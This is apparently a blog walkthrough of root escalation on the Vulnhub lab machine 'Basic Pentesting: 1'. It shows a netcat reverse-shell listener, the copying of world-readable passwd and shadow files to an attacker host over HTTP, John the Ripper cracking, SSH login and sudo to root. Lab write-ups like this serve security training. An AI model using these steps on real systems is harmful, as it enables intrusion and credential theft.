This blog show the privilege escalation walkthrough for machine Basic Pentesting: 1 on Vulnhub

Link for the machine :https://www.vulnhub.com/entry/basic-pentesting-1,216/

So we got the reverse shell from wordpress ( by uploading a custom plugin with reverse shell)

root@kali:~/basic# nc -l -v -p 8886
listening on [any] 8886 …
connect to [192.168.56.4] from vtcesc [192.168.56.101] 55232
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
05:46:51 up 6:54, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
marlinsp tty7 :0 03:43 6:54m 1:10 0.08s /sbin/upstart –user
marlinsp pts/2 192.168.56.4 03:47 1:58m 0.07s 0.01s sshd: marlinspike [priv]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off

We are logged in as www-data

$ /bin/bash -i
bash: cannot set terminal process group (1236): Inappropriate ioctl for device
bash: no job control in this shell
www-data@vtcsec:/$

www-data@vtcsec:/$

So both shadow and passwd file is readable ( not good)

www-data@vtcsec:/$ cd /etc
cd /etc
www-data@vtcsec:/etc$ ls -alrth | grep passwd
ls -alrth | grep passwd
-rw——- 1 root root 2.4K Nov 16 2017 passwd-
-rw-rw-rw- 1 root root 2.4K Nov 16 2017 passwd
www-data@vtcsec:/etc$ ls -alrth | grep shadow
ls -alrth | grep shadow
-rw——- 1 root root 871 Nov 14 2017 gshadow-
-rw-r—– 1 root shadow 881 Nov 16 2017 gshadow
-rw——- 1 root root 1.3K Nov 16 2017 shadow-
-rw-r–r– 1 root shadow 1.3K Nov 16 2017 shadow
www-data@vtcsec:/etc$

Running python server on target machine

www-data@vtcsec:/etc$ python -m SimpleHTTPServer
python -m SimpleHTTPServer

Transfering passwd and shadow file to Kali linux machine

root@kali:~/basic# wget http://192.168.56.101:8000/passwd
–2019-07-22 05:49:51– http://192.168.56.101:8000/passwd
Connecting to 192.168.56.101:8000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2364 (2.3K) [application/octet-stream]
Saving to: ‘passwd.1’

passwd 100%[==================================================================================>] 2.31K –.-KB/s in 0s

2019-07-22 05:49:51 (272 MB/s) – ‘passwd’ saved [2364/2364]

root@kali:~/basic# wget http://192.168.56.101:8000/shadow
–2019-07-22 05:49:55– http://192.168.56.101:8000/shadow
Connecting to 192.168.56.101:8000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1305 (1.3K) [application/octet-stream]
Saving to: ‘shadow’

shadow 100%[==================================================================================>] 1.27K –.-KB/s in 0.006s

2019-07-22 05:49:55 (201 KB/s) – ‘shadow’ saved [1305/1305]

root@kali:~/basic#

Preparing hash file to crack with john

root@kali:~/basic# unshadow passwd shadow >password.txt

john found that password is same as username

root@kali:~/basic# john password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Wordlist
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 16
needed for performance.
marlinspike (marlinspike) >>>>>>>>>>>>
1g 0:00:00:00 DONE 1/3 (2019-07-22 03:42) 33.33g/s 166.6p/s 166.6c/s 166.6C/s marlinspike..marli
Use the “–show” option to display all of the cracked passwords reliably
Session completed

Remember we have ssh service which is open.

login into ssh via marlinspike

root@kali:~/basic# ssh marlinspike@192.168.56.101
The authenticity of host ‘192.168.56.101 (192.168.56.101)’ can’t be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.56.101’ (ECDSA) to the list of known hosts.
marlinspike@192.168.56.101’s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

• Documentation: https://help.ubuntu.com
• Management: https://landscape.canonical.com
• Support: https://ubuntu.com/advantage

marlinspike@vtcsec:~$

marlinspike@vtcsec:~$ sudo -l

password for marlinspike:
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL

marlinspike@vtcsec:~$ sudo -l

password for marlinspike:
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL >>>>>>>>>>>

Everything is open

marlinspike@vtcsec:~$ sudo sh

#id

uid=0(root) gid=0(root) groups=0(root)

#id;date;whoami;hostname

uid=0(root) gid=0(root) groups=0(root)
Mon Jul 22 03:48:44 EDT 2019
root
vtcsec

Keep Learning 🙂